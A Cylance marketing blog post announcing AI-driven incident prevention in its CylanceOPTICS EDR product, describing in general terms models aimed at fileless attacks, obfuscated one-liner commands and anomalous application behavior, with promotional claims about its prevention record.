The Next Step for AI-Based Security

Cylance, the innovator in AI-based threat prevention, professed “prevention is possible” with the introduction of its next-gen anti-malware solution CylancePROTECT®, which leverages machine learning models to prevent malicious code from executing on endpoints.

With no signatures or constant updates required, Cylance provides superior prevention with minimal impact on the endpoint. Now almost four years and thousands of satisfied customers later, we are proud to say that Cylance delivers reliable, consistent threat prevention which has catalyzed a pivot in how all security vendors talk about security: prevention is possible.

One of the key capabilities of CylancePROTECT is its uncanny ability to prevent threats that have yet to even be created. In fact, in a recent commissioned lab test we found that on average our model prevented threats up to 2.5 years before they were detected in the wild.

That is astounding proactive protection when compared to reactive, signature-based security solutions that falter significantly when even a single update is not applied. We say this to illustrate one point: at Cylance, we are good at predicting the future of threats. It’s built into our products and our culture. So, it should come as no surprise that are continually working on new ways to use AI to solve security problems.

To that end, this week at RSA we will be previewing an industry-first AI security implementation: AI-driven incident prevention in our CylanceOPTICS™ Endpoint Detection and Response (EDR) solution.

The Case for AI-Driven Incident Prevention

There is no doubt that organizations can benefit from EDR products, which enable faster response and remediation to security incidents. However, as with most security technologies, attackers have worked hard to develop tactics, techniques, and procedures (TTPs) to defeat legacy rule-based technologies, making them less effective over time.

The evolution of TTPs and their impact on security solutions very much parallels the demise of legacy antivirus (AV) products that have been largely marginalized by attackers. In the very near future, rule-based EDR products will soon go the way of the dodo, making way for AI-Driven incident prevention. Cylance is on the forefront of this movement with the introduction of this new capability.

CylanceOPTICS AI-Driven Incident Prevention

Powered by the only purpose-built, AI threat detection model developed to run on the endpoint, CylanceOPTICS uses machine learning to analyze changes occurring on each endpoint to uncover threats that would be difficult, if not impossible, for a human analyst to uncover in a reasonable amount of time.

Unlike rule-based EDRs that require a person to write, maintain, and continually add rules (which are essentially behavior signatures) to trap single attacks, AI-incident prevention has the ability to render an entire class of attacks useless. A single model, specifically trained to identify a specific attack class (or TTP) can be deployed on an endpoint, essentially eliminating the need for the hundreds or thousands, of behavior rules a security analyst would have to create and maintain to deliver comparable protection.

With AI-driven incident prevention, when a potential threat is identified, CylanceOPTICS can autonomously take decisive actions in real-time to stop the attack and avoid the cost, risk, and long-term impacts that come with a widespread security incident. This first release of AI models for threat detection and incident prevention will target the following specific attack types:

Fileless Attacks:

So-called “fileless” attacks may be fileless in the sense that they do not rely on a malicious or suspicious binary; however, they will typically rely on other system-based artifacts that can be easily sensed and correlated with CylanceOPTICS.

The Fileless Attack Model evaluates the context and parameters of system utility invocations to understand their intended outcomes.

Malicious or Suspicious “One-Liner” Commands:

Scripting engines like CMD, Powershell, and Wscript are the workhorses of IT operations, but they expose a significant amount of functionality that can be leveraged by malicious actors.

This malicious or suspicious usage becomes increasingly more difficult to detect when multiple actions are strung together and hidden behind varying layers of obfuscation, whether it be encoding or abuse of environment variables, whitespace, and other characters.

The Malicious One-Liner Model evaluates the content of command line scripts with an emphasis on the language of the script and the command line context of the script

Malicious Application Behavior:

An overwhelming number of attack target a small, predictable number of trusted applications commonly found in enterprise environments.

The Malicious Application Behavior Model learns legitimate interactions between common software and the Operating System and blocks anything that veers too far off course.

The Future of AI-based Incident Prevention

The term “Artificial Intelligence” (AI) has been coopted by many vendors to give the impression that they are offering cutting-edge security capabilities. As the innovator of AI-based security tools, we here at Cylance we will continue to deliver new AI models targeted as specific TTPs into the future. Beyond that we continually look at other implementations of AI that will solve the security problems of the future.

One thing is for sure: whether you are a solo attacker or a nation-state actor, your job just got a lot harder with the introduction of AI-based incident prevention in CylanceOPTICS.

Be sure to visit us at booth #3911 in the North Hall at the RSA conference to get a preview of our AI-driven incident prevention and sign up for our webinar. See you then!